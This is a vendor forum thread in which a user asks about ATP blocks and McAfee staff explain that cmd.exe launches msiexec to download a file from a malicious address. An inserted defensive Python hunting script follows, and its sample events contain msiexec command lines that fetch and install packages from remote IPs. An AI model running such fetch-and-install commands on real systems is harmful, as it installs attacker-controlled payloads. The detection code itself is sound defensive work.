blocking suspicious activity ATP

Hi everyone,

I would like you to see the related image, since for a few days I have had the following log on some machines. The ATP blocks it, but nevertheless, no matter how much analysis is carried out, the behavior persists. I would like to know what may be causing it and how to eliminate it.

4 Replies
yaz (McAfee Employee)

Re: blocking suspicious activity ATP

Hi @antivirusfnc,

Thank you for reaching out to McAfee Community.

From the provided details, it looks like you need information on the file.

I suggest you raise an SR and provide us with a sample as per the KB below, and we can share our analysis on this one.

https://kc.mcafee.com/corporate/index?page=content&id=KB68030


Was my reply helpful?

If yes, please give me a Kudo.

If I have answered your query, kindly mark this as the solution so that together we help other community members.

Re: blocking suspicious activity ATP

Hi, how are you?

This is the problem, I see the crash log in the console but I don't see any files on the workstation. How can I get this sample?


rfranci (McAfee Employee)

Re: blocking suspicious activity ATP

Hi @antivirusfnc ,

Thank you for reaching us on the community!

As per the image attached to the post, I see that cmd.exe is invoked to run an msiexec command to download a file (which appears to be a PNG file as per the screenshot) from a malicious site/IP address.

I suspect that the infected machines must have a malicious file containing the command placed in a start-up location, or must be running it as a task at a specified time interval.

As specified by @yaz, I would request you to open a malware ticket with the support team to check on this.

Thanks,
- Rohit Francis
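
The pattern rfranci describes (cmd.exe invoking msiexec to fetch a package from a remote URL) can be hunted for across process-creation telemetry, which also helps answer the original question of where the sample is when nothing is left on disk. The script below is an added example, not code from this thread or from McAfee: the Sysmon-style key=value event layout, the field names and the sample lines are constructed for illustration. It flags msiexec launches whose command line carries a remote URL, raises the severity when the parent is a command shell as in the screenshot, and collects the contacted hosts as indicators to pivot on when checking start-up locations and scheduled tasks for the persisted command.

```python
import re
from urllib.parse import urlparse

# Constructed process-creation events in a Sysmon-style key=value layout.
# These are sample lines written for this example, not telemetry from the thread.
SAMPLE_EVENTS = [
    'UtcTime="2021-01-10 09:12:01" ParentImage=C:\\Windows\\System32\\cmd.exe '
    'Image=C:\\Windows\\System32\\msiexec.exe '
    'CommandLine="msiexec.exe /q /i http://198.51.100.23/img/update.png"',
    # Benign: interactive install of a local package
    'UtcTime="2021-01-10 09:15:44" ParentImage=C:\\Windows\\explorer.exe '
    'Image=C:\\Windows\\System32\\msiexec.exe '
    'CommandLine="msiexec.exe /i C:\\Users\\alice\\Downloads\\7zip.msi"',
    # Benign: the Windows Installer service being started
    'UtcTime="2021-01-10 09:16:02" ParentImage=C:\\Windows\\System32\\services.exe '
    'Image=C:\\Windows\\System32\\msiexec.exe '
    'CommandLine="C:\\Windows\\System32\\msiexec.exe /V"',
    'UtcTime="2021-01-11 09:12:03" ParentImage=C:\\Windows\\System32\\cmd.exe '
    'Image=C:\\Windows\\System32\\msiexec.exe '
    'CommandLine="msiexec.exe /q /i https://203.0.113.7/img/update.png"',
    # Remote package from a script host: still worth a look, but not the shell pattern
    'UtcTime="2021-01-11 10:01:00" ParentImage=C:\\Windows\\System32\\wscript.exe '
    'Image=C:\\Windows\\System32\\msiexec.exe '
    'CommandLine="msiexec.exe /qn /i http://203.0.113.7/pkg.msi"',
]

# key=value pairs; a value is either a double-quoted string (may contain spaces) or a bare token
KV_RE = re.compile(r'(\w+)=("([^"]*)"|(\S+))')
# Any http(s) URL inside the command line
URL_RE = re.compile(r'https?://[^\s"]+', re.IGNORECASE)


def parse_event(line):
    """Parse one key=value event line into a dict."""
    event = {}
    for m in KV_RE.finditer(line):
        event[m.group(1)] = m.group(3) if m.group(3) is not None else m.group(4)
    return event


def basename(path):
    """Lower-cased file name of a Windows path (handles both slash styles)."""
    return path.replace('/', '\\').rsplit('\\', 1)[-1].lower()


def classify(event):
    """Return a finding for msiexec pulling a package from a remote URL, else None."""
    if basename(event.get('Image', '')) != 'msiexec.exe':
        return None
    m = URL_RE.search(event.get('CommandLine', ''))
    if not m:
        return None  # local package or service start: not the pattern we hunt for
    url = m.group(0)
    parent = basename(event.get('ParentImage', ''))
    # A remote package is unusual by itself; a shell parent matches the thread's screenshot
    severity = 'high' if parent in {'cmd.exe', 'powershell.exe'} else 'medium'
    return {
        'time': event.get('UtcTime'),
        'parent': parent,
        'url': url,
        'host': urlparse(url).hostname,
        'severity': severity,
    }


def find_remote_msiexec(lines):
    """Run the classifier over raw event lines and keep only the findings."""
    return [f for f in (classify(parse_event(line)) for line in lines) if f]


def indicator_hosts(findings):
    """Distinct contacted hosts, the indicators to search persistence locations for."""
    return sorted({f['host'] for f in findings})


if __name__ == '__main__':
    hits = find_remote_msiexec(SAMPLE_EVENTS)
    for f in hits:
        print(f"{f['time']}  {f['severity']:<6}  {f['parent']} -> msiexec  {f['url']}")
    print('hosts to pivot on:', ', '.join(indicator_hosts(hits)))
```

Run against real exported events, the host list is what you would search for in Run keys, the Startup folders and scheduled-task actions on the affected machines; the command line itself is the artifact to attach to the support case when no file is present on disk.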

Re: blocking suspicious activity ATP

Hi, and thank you for your collaboration!!

The support case was created (4-22251102041); it was updated by sending the Procmon and MER logs from one of the affected machines.

I am waiting for more progress
